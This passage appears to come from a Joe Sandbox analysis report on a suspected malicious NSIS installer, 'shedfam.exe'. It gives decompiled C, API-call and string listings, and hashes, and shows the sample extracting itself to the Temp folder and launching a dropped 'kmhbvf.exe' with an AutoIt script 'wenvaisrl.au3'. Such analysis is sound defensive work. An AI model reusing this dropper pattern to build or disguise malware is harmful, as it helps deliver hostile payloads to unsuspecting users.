							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80;
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 =  *0x423f80;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403754
0x0040375d
0x00403764
0x00403766
0x0040377a
0x0040378c
0x00403796
0x0040379b
0x004037a1
0x004037b4
0x004037b4
0x004037bf
0x00403768
0x00403773
0x00403773
0x004037c4
0x004037ce
0x004037d7
0x004037dc
0x004037ed
0x00403874
0x0040387c
0x00403885
0x00403885
0x0040389b
0x004038a1
0x004038af
0x0040393e
0x00403946
0x00403950
0x00403955
0x0040395b
0x004039e5
0x004039ea
0x004039ec
0x00403a08
0x00000000
0x00403a08
0x004039ee
0x004039f4
0x004039fc
0x004039fc
0x00000000
0x004039f4
0x00403969
0x00403974
0x00403979
0x0040397b
0x00403982
0x00403982
0x0040398d
0x00403995
0x00403997
0x00403999
0x004039a2
0x004039a5
0x004039ab
0x004039ab
0x004039ca
0x004039db
0x00000000
0x004039e0
0x00403948
0x0040394a
0x00000000
0x004038b5
0x004038b5
0x004038bb
0x004038c5
0x004038cd
0x004038d7
0x004038dd
0x004038eb
0x00403a0d
0x00403a0d
0x00000000
0x00403a0d
0x004038f1
0x004038fa
0x00403939
0x00000000
0x00403939
0x004037f3
0x004037f3
0x004037f8
0x00000000
0x00000000
0x00403802
0x00403812
0x00403817
0x0040381e
0x00000000
0x00000000
0x00403822
0x00403824
0x00403831
0x00403831
0x00403839
0x0040383f
0x00403867
0x0040386f
0x00000000
0x00403851
0x00403852
0x0040385b
0x00403861
0x00403862
0x00000000
0x00403862
0x0040385d
0x0040385f
0x00000000
0x00000000
0x00000000
0x0040385f
0x0040383f

APIs

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\shedfam.exe",00000000), ref: 004037BF
lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
LoadImageA.USER32 ref: 0040389B

Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66

RegisterClassA.USER32 ref: 004038E2
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
CreateWindowExA.USER32 ref: 00403933
ShowWindow.USER32(00000005,00000000), ref: 00403969
GetClassInfoA.USER32 ref: 00403995
GetClassInfoA.USER32 ref: 004039A2
RegisterClassA.USER32 ref: 004039AB
DialogBoxParamA.USER32 ref: 004039CA

Strings

RichEd32, xrefs: 0040397D
/B, xrefs: 00403802
.DEFAULT\Control Panel\International, xrefs: 004037AA
"C:\Users\user\Desktop\shedfam.exe", xrefs: 00403752
7B, xrefs: 004038AA
RichEdit20A, xrefs: 0040398D, 00403993
C:\Users\user\AppData\Local\Temp\, xrefs: 0040375A
.exe, xrefs: 00403841
!/B, xrefs: 00403824
_Nb, xrefs: 004038F1, 004038F6
1033, xrefs: 0040376E, 004037BA
C:\Users\user\AppData\Local\Temp, xrefs: 004037CE, 004037D6, 0040386E, 00403874, 00403884
RichEdit, xrefs: 0040399C
RichEd20, xrefs: 0040396F
Control Panel\Desktop\ResourceLocale, xrefs: 00403782

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\shedfam.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3776178675
Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\shedfam.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					if( *0x423f94 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403207( *0x423f94 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x11b837
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417120; // 0xd050e
							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423f94 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c96
0x00402c99
0x00402cb3
0x00402cb8
0x00402ccb
0x00402cd0
0x00402cd6
0x00000000
0x00402cd8
0x00402ce9
0x00402cfa
0x00402d01
0x00402d09
0x00402d0e
0x00402d10
0x00402e00
0x00402e02
0x00402e0e
0x00000000
0x00000000
0x00402e17
0x00402e43
0x00402e48
0x00402e53
0x00402e55
0x00402e66
0x00402e81
0x00402e8a
0x00402e8f
0x00402eae
0x00402ebe
0x00402ed0
0x00402ed5
0x00402edd
0x00402eea
0x00402ef2
0x00402ef7
0x00402ef9
0x00402ef9
0x00402f01
0x00402f01
0x00402f04
0x00402f05
0x00402f05
0x00402f08
0x00402f0a
0x00402f0a
0x00402f0d
0x00402f14
0x00402f20
0x00000000
0x00402f25
0x00000000
0x00402edd
0x00000000
0x00402e91
0x00402e1f
0x00402e31
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d16
0x00402d16
0x00402d1b
0x00402d1f
0x00402d26
0x00402d2d
0x00402d2f
0x00402d2f
0x00402d37
0x00402d3e
0x00402e9d
0x00402edf
0x00000000
0x00402edf
0x00402d4a
0x00402dce
0x00402dd1
0x00402dd6
0x00000000
0x00402dce
0x00402d57
0x00402d5c
0x00402d64
0x00402d8a
0x00402d90
0x00402d99
0x00402d9f
0x00402da4
0x00402daa
0x00000000
0x00000000
0x00402db4
0x00402dbc
0x00402dbf
0x00402dc4
0x00402dc6
0x00402dc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00402db4
0x00402dd7
0x00402ddd
0x00402ded
0x00402ded
0x00402df0
0x00402df6
0x00402df8
0x00000000
0x00402d16

APIs

GetTickCount.KERNEL32 ref: 00402C9C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\shedfam.exe,00000400), ref: 00402CB8

Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 004059D6
Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 00402D01
GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48

Strings

Inst, xrefs: 00402D6F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
soft, xrefs: 00402D78
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
"C:\Users\user\Desktop\shedfam.exe", xrefs: 00402C88
C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
C:\Users\user\Desktop\shedfam.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
Error launching installer, xrefs: 00402CD8
Null, xrefs: 00402D81
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\shedfam.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2480097807
Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x00402672
0x00402672
0x004028a1
0x004028a4
0x004028a4
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x004028aa
0x004028aa
0x004028aa
0x00401833
0x00401833
0x00401834
0x00401492
0x00402224
0x00402224
0x00402224
0x00401831
0x0040182a
0x004028ac
0x004028b0
0x004028b0
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x0040221f
0x00000000
0x0040221f
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3","C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",00000000,00000000,"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3",C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3

Strings

"C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3", xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3"$C:\Users\user\AppData\Local\Temp
API String ID: 1941528284-416042440
Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423fd8;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f33
0x00402f3d
0x00402f46
0x00402f4a
0x00402f55
0x00402f55
0x00402f5d
0x00402f5f
0x00402f66
0x00402f82
0x00402f86
0x0040304f
0x0040304f
0x00000000
0x00402f95
0x00402f98
0x00402f9e
0x00402fa5
0x00402fa8
0x00402fb1
0x0040301e
0x00403024
0x00403026
0x00403026
0x00403038
0x0040303c
0x00000000
0x0040303e
0x0040303e
0x00403041
0x00403047
0x00000000
0x00403047
0x00402fb3
0x00402fb6
0x0040304a
0x0040304a
0x00402fbc
0x00402fc1
0x00402fc1
0x00402fc9
0x00402fcb
0x00402fcb
0x00402fdc
0x00402fe0
0x00000000
0x00000000
0x00402ff4
0x00402ffc
0x0040301a
0x00403051
0x00403051
0x00403003
0x00403003
0x00403006
0x00403009
0x0040300c
0x00403016
0x00000000
0x00403018
0x00000000
0x00403018
0x00403016
0x00000000
0x00402ffc
0x00000000
0x00402fc1
0x00402fb6
0x00402fb1
0x00402fa8
0x00402f86
0x00403052
0x00403056

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
